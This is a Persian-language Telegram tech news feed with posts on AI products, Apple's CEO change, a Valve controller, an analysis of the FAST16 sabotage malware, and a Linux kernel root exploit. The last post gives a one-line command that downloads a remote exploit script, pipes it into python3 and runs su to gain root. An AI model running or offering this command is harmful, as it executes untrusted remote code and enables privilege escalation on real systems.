TechTube 𝕏 تک توب
77K subscribers
8.94K photos
3.13K videos
11 files
8.77K links
خبرهای جالب دنیای تکنولوژی و منبع کانال‌های تلگرامی

خرید اکانت‌های پریمیوم:
@TechTubeShop

ارتباط و تبلیغات:
@TechTube_Admin
Download Telegram
شرکت OpenAI نسل دوم مدل ساخت تصویر ChatGPT Images رو عرضه کرده که پیشرفت بزرگی در ساخت عکس‌های همراه با متن به خصوص با زبان فارسی و همچنین پیروی از پرامپت‌ها و ترکیب جزئیات بالا مثل تصاویر با متون ریز و آیکون‌های زیاد داشته. بنابراین خروجی اون کمتر حس هوش مصنوعی میده و بیشتر به طراحی حرفه‌ای نزدیکه. مثلا رابط کاربری‌هایی که می‌سازه بیش از اینکه به عکس تولید شده با هوش مصنوعی شبیه باشن، به یک اسکرین‌شات شبیهن.

این اولین مدل ساخت تصویر این شرکت هست که قابلیت استدلال (thinking) داره و با داشتن قابلیت جستجو در وب، می‌تونه اطلاعات بروز رو در هنگام ساخت تصویر برای موضوع مدنظر کاربر جمع‌آوری کنه.

همچنین با این امکان، مدل می‌تونه یک عکس رو پشت هم بسازه، بازبینی کنه و بهبود بده تا در نهایت به نتیجه مطلوب کاربر برسه. علاوه بر این با این دستور، امکان ساخت تا ۸ عکس به صورت هم‌زمان رو هم داره.

این مدل از حالا برای تمامی کاربران ChatGPT به صورت رایگان در دسترس هست ولی قابلیت thinking اون فقط توسط کاربران اشتراک Plus به بالا قابل استفاده خواهد بود.

(تمامی عکس‌های این پست با این مدل ساخته شدن)

🔎 techcrunch

📍 @TechTube
💔5418🤣106🔥5🤯4🐳1🌚1
شرکت SpaceX (که مالک شرکت هوش مصنوعی xAI هست) اعلام کرده که با سازنده ابزار برنامه‌نویسی محبوب Cursor وارد همکاری شده تا با همدیگه مدل هوش مصنوعی مختص برنامه‌نویسی و کارهای اداری، برای رقابت با انتروپیک و OpenAI و محبوبیت گسترده ابزارهای برنامه‌نویسی اون‌ها یعنی Claude Code و Codex، رو توسعه بدن.

در این همکاری، کرسر با داده‌های برنامه‌نویسی و تخصصی که در این حوزه داره و با استفاده از زیرساخت عظیم xAI از جمله دیتاسنتر هوش مصنوعی Colossus 2، نسل بعدی مدل برنامه‌نویسی این شرکت موسوم به Composer رو توسعه میده.

طبق این قرارداد اگر این پروژه به موفقیت برسه، SpaceX این گزینه رو در اختیار داره که شرکت سازنده کرسر رو در معامله‌ای به ارزش 60 میلیارد دلار خریداری کنه.

اما اگر این پروژه موفق نشه یا موفقیت چندانی کسب نکنه، SpaceX ده میلیارد دلار بابت این تلاش به شرکت سازنده کرسر پرداخت خواهد کرد.

🔎 techcrunch

📍 @TechTube
4112🌭2👏1🐳1🤪1
همونطور که انتظار می‌رفت، شرکت اپل اعلام کرده که تیم کوک ۶۵ ساله، مدیرعامل فعلی این شرکت، از اول ماه سپتامبر و قبل از معرفی آیفون‌های جدید، از این سمت کناره‌گیری می‌کنه و جان ترنوس، معاون ارشد بخش مهندسی سخت‌افزار اپل، سکان رهبری اپل رو در دست خواهد گرفت.

تیم کوک بعد از مرگ استیو جابز و در سال ۲۰۱۱ مدیرعامل اپل شد و در دوران مدیریت اون، اپل رشد فوق‌العاده‌ای رو تجربه کرد به‌طوری که درآمد این شرکت در دوران مدیریت اون بیش از ۴ برابر و ارزش این شرکت بیش از ۱۱ برابر افزایش یافت. در دوران مدیریت تیم کوک اپل محصولات بسیار موفقی همچون اپل‌واچ رو عرضه کرد که در حال حاضر بیش از ۲۵ درصد کل فروش ساعت‌های هوشمند جهان رو تشکیل میده. ولی بیشتر محصولات عرضه شده در دوران اون انقلابی نبودن و محصولات جدید این شرکت همچون هدست واقعیت مجازی Vision Pro آنچنان که انتظار می‌رفت، موفق ظاهر نشدن.

جان ترنوس ۵۱ ساله (همون سنی که تیم کوک مدیرعامل اپل شد)، در سال ۲۰۰۱ و بعد از کار کردن در شرکت مرتبط با واقعیت مجازی به تیم طراحی محصول اپل ملحق شد، در سال ۲۰۱۳ به سمت معاون مهندسی سخت‌افزار منصوب شد و در سال ۲۰۲۱ به معاون ارشد بخش مهندسی سخت‌افزار ارتقای سمت داده شد و به جوان‌ترین عضو تیم اجرایی تبدیل شد. در طی یک دهه گذشته تأثیر ایشون روی محصولات عرضه شده توسط اپل روز به روز بیشتر شده و بیش از پیش در معرفی محصولات حضور داشته.

با مدیرعامل شدن جان ترنوس، آقای جانی سروجی، معاون ارشد تکنولوژی‌های سخت‌افزاری اپل، از حالا به مدیر ارشد سخت‌افزار اپل ارتقای سمت داده میشه تا مدیریت کامل سخت‌افزار اپل رو در دستش بگیره. آقای سروجی در سال ۲۰۰۸ به اپل ملحق شد و تیم اون در سال ۲۰۱۰ اولین چیپ اختصاصی اپل رو برای آیفون و آیپد طراحی کردن و از اون موقع شاهد چیپ‌های قدرتمند سری A و M و توسعه هر چه بیشتر چیپ‌های اختصاصی اپل توسط این تیم زیر دست ایشون بودیم.

🔎 techcrunch

📍 @TechTube
50😁6🌭3💋31🐳1💘1
Forwarded from OpenPCB
محقق‌های SentinelLABS یه بدافزار خیلی قدیمی و عجیب به اسم FAST16 رو پیدا کردن که دیپلوی اون برمی‌گرده به سال ۲۰۰۵، یعنی دقیقا پنج سال قبل از استاکس‌نت، و عملا اولین عملیات خرابکارانه نرم‌افزاری با دقت بالا تو تاریخ حملات سایبری به حساب میاد.

معماری این بدافزار دو تا کامپوننت اصلی داره، اولی یه Carrier به اسم svcmgmt.exe هست که یه ماشین مجازی Lua رو تو خودش امبد کرده و مثل یه کرم از طریق شبکه و سرویس‌های ویندوز بین سیستم‌های شبکه پخش میشه، فایل‌ها رو کپی می‌کنه و اسکریپت‌های Lua رو ران می‌کنه. بخش دوم یه Kernel Driver به اسم fast16.sys هست که تو سطح کرنل ویندوزهای ۲۰۰۰ و XP میشینه و مستقیما کد اجرایی نرم‌افزار هدف رو تو حافظه دستکاری می‌کنه. مکانیزمش اینطوریه که فقط دنبال باینری‌هایی می‌گرده که با کامپایلر Intel C/C++ بیلد شده باشن و اینو از روی اسم فایل و یه استرینگ خاص تو هدر PE چک می‌کنه. وقتی نرم‌افزار هدف اجرا میشه، درایور با استفاده از ۱۰۱ تا قانون خاص، سکشن‌های xdata. و pdata. رو دستکاری می‌کنه و دستورات FPU رو تغییر می‌ده تا محاسبات floating-point رو نامحسوس خراب کنه.

این یعنی تو برنامه‌هایی مثل شبیه‌سازی‌های فیزیک، مهندسی عمران، رمزنگاری یا تحقیقات هسته‌ای(که انگار هدف اصلی همین بوده)، نتایج محاسبات به صورت سیستماتیک دستکاری و تحریف می‌شن‌، بدون اینکه برنامه کرش کنه یا یوزر متوجه اشتباه بودن و غیر طبیعی بودن نتایج بشه، که خیلی با رویکرد استاکس‌نت که مستقیما PLC ها رو هدف قرار می‌داد، فرق داره.

از اهداف احتمالی که تحلیل شدن میشه به نرم‌افزار‌های LS-DYNA 970 برای شبیه‌سازی انفجار که تو برنامه AMAD کاربرد داشته، PKPM برای مهندسی سازه تو چین و MOHID برای مدل‌سازی هیدرودینامیک اشاره کرد.

لینک شدن این بدافزار به NSA و Shadow Brokers از اونجا میاد که اسم fast16 دقیقا تو لیست درایورهای لیک شده سال ۲۰۱۷ تحت عنوان drv_list.txt وجود داشت و جلوش به عنوان یه deconfliction signature نوشته شده بود که کاری بهش نداشته باشین تا اپراتورهای خودی باهاش تداخل پیدا نکنن، و مچ شدن PDB path تو خود بدافزار هم این ارتباط رو کاملا تایید می‌کنه.

از نظر تاریخی این بدافزار که تقریبا کشف‌نشده مونده بود نشون میده که از اواسط دهه ۲۰۰۰، یه سازمان دولتی تو لول NSA این قابلیت رو داشته که محاسبات پیچیده و حساس علمی و هسته‌ای کشورهای دیگه رو در خفا و کاملا بی‌سر‌وصدا دستکاری و خراب کنه.

مقاله اصلی رو میتونید اینجا بخونید.

📡openpcb
🤯863👌3🔥2🤬2😁1💔1👨‍💻1
This media is not supported in your browser
VIEW IN TELEGRAM
🌭6
🦸‍♂️وقتی فروشت کم شده و کانال‌های مختلف تبلیغ قبول نمی‌کنن، ادزپلتفرم میاد کمک‌ات 🦸‍♂️
@TgAdsPlatformBot
Please open Telegram to view this post
VIEW IN TELEGRAM
🍌59😁16🌭6🤬32🎉1
شرکت انتروپیک به بنیاد Blender کمک مالی کرده و پشتیبانی از این نرم‌افزار طراحی سه‌بعدی رو به هوش مصنوعی Claude هم اضافه کرده تا این هوش مصنوعی با وصل شدن به بلندر بتونه کارهای تکراری کاربر رو انجام بده.

این شرکت همچنین پشتیبانی از نرم‌افزار Autodesk Fusion رو هم اضافه کرده که به طراحان و مهندسان در طراحی و ویرایش مدل‌ها و قطعات سه‌بعدی کمک می‌کنه.

🔎 anthropic

📍 @TechTube
🔥505🤩4🥴2
با اینکه هنوز خبری از عرضه Steam Machine نیست، ولی شرکت Valve زمان عرضه و قیمت Steam Controller رو منتشر کرده که دسته بازی‌ای با چینشی مشابه Steam Deck داره، دو ترک‌پد در پایینش قراره گرفته که برای کنترل رابط کاربری همانند ماوس کاربردیه و میشه بازی‌هایی که برای ماوس بهینه شدن رو با دسته هم بازی کرد. علاوه بر این از جوی‌استیک‌های مغناطیسی TMR استفاده می‌کنه که نگرانی‌ای از بابت Drift کردن اون‌ها وجود نداره.

این دسته هم از طریق بلوتوث و هم از طریق دانگل مخصوص اون که حکم شارژ رو هم داره به دستگاه‌های مختلف متصل می‌شه، عمر باتری اون ۳۵ ساعت هست و از ۴ می با قیمت ۱۰۰ دلار قابل خریده.

🔎 theverge

📍 @TechTube
💔188🌚3😁1
This media is not supported in your browser
VIEW IN TELEGRAM
🌭1
جدیدترین اخبار و تریلرهای ویدئوگیم و فیلم و سریال را از وب‌سایت مون‌مدیا دنبال کنید

🌙 MoonMedia.ir
Please open Telegram to view this post
VIEW IN TELEGRAM
🌭1710🍌2🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
هوش مصنوعی جمنای از حالا میتونه فایلهای مختلف از جمله PDF، ورد، اکسل، فایلهای متنی و غیره براساس موضوع مدنظرتون بسازه تا بتونین اونهارو به راحتی دانلود کنید.

🔎 GeminiApp

📍 @TechTube
❤‍🔥48💔98🔥5
محقق شرکت امنیتی Theori با کمک پلتفرم تست نفوذ با هوش مصنوعی Xint موفق شده حفره امنیتی خطرناکی در هسته لینوکس رو کشف کنه که به هر فایل اجرایی امکان گرفتن دسترسی روت روی تقریبا هر توزیع لینوکسی رو فراهم میکنه!

این حفره موسوم به Copy Fail با کد CVE-2026-31431 به دلیل باگی در سیستم کش فایل هسته لینوکس به وجود اومده که با دستکاری باینری کش شده setuid-root میتونه دسترسی روت دریافت کنه و کل سیستم رو کنترل کنه و مخفی بمونه. حتی در برخی حالات امکان دسترسی به هاست از داخل یک کانتینرها هم میتونه ممکن باشه!

این باگ تقریبا روی هر توزیعی که از هسته لینوکسِ عرضه شده از سال 2017 تاکنون استفاده میکنه، قابل اجرا هست و روی توزیعهایی مثل Ubuntu، SUSE، RHEL و غیره تست شده.

برای استفاده از اون فقط کافیه یک فایل 732 بایتی پایتون رو اجرا کرد تا در کسری از ثانیه روی سیستمی با یوزر عادی، دسترسی روت بگیره. کدهای اون هم با بقیه زبانها از جمله Go هم پیاده سازی شدن. برای تست راحت اون (که نیاز به اینترنت برای دریافت کدها داره) میتونید از دستور زیر استفاده کنید:
curl https://copy.fail/exp | python3 && su


در حال حاضر این باگ در اپدیت جدید هسته لینوکس اصلاح شده ولی فقط توزیعهای مبتنی بر ارچ این اپدیت رو اعمال کردن و توزیعهای دیگه از جمله اوبونتو، دبیان و فدورا همچنان در حال رفع این باگ هستن.

🔎 xint

📍 @TechTube
25😱8🔥2💔1😭1